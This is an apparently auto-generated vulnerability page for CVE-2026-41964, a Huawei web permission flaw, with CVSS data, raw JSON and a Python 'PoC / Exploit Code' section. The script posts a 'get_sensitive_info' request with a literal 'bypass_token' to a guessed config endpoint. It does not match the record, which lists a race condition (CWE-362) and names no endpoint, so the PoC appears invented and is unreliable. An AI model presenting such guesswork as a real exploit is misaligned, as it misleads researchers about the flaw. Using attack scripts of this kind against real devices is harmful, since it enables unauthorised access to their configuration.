Security Vulnerability Report
中文
CVE-2026-41964 CVSS 8.4 HIGH

CVE-2026-41964

Published: 2026-05-15 10:16:35
Last Modified: 2026-05-15 14:08:51

Description

Permission control vulnerability in the web. Impact: Successful exploitation of this vulnerability may affect availability.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

华为部分产品 2026年5月安全补丁发布之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-41964: Permission Control Bypass # Target: Local Web Component of Affected Huawei Product def check_vulnerability(target_ip, target_port): # The vulnerable endpoint typically requires authentication, # but due to the vulnerability, it can be accessed locally without it. url = f"http://{target_ip}:{target_port}/api/v1/system/config" headers = { "User-Agent": "Local-Integrity-Check", "Content-Type": "application/json" } # Malicious payload attempting to access sensitive configuration payload = { "action": "get_sensitive_info", "token": "bypass_token" } try: print(f"[*] Attempting to connect to {url}...") response = requests.post(url, json=payload, headers=headers, timeout=5) if response.status_code == 200: print("[+] Potential vulnerability detected!") print("[+] Server responded with data:") print(response.text[:200]) # Truncate output for readability else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": # Example usage assuming the service runs on localhost check_vulnerability("127.0.0.1", 8080)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41964", "sourceIdentifier": "[email protected]", "published": "2026-05-15T10:16:35.100", "lastModified": "2026-05-15T14:08:50.797", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Permission control vulnerability in the web. Impact: Successful exploitation of this vulnerability may affect availability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}]}], "references": [{"url": "https://consumer.huawei.com/en/support/bulletin/2026/5/", "source": "[email protected]"}, {"url": "https://consumer.huawei.com/en/support/bulletinlaptops/2026/5/", "source": "[email protected]"}]}}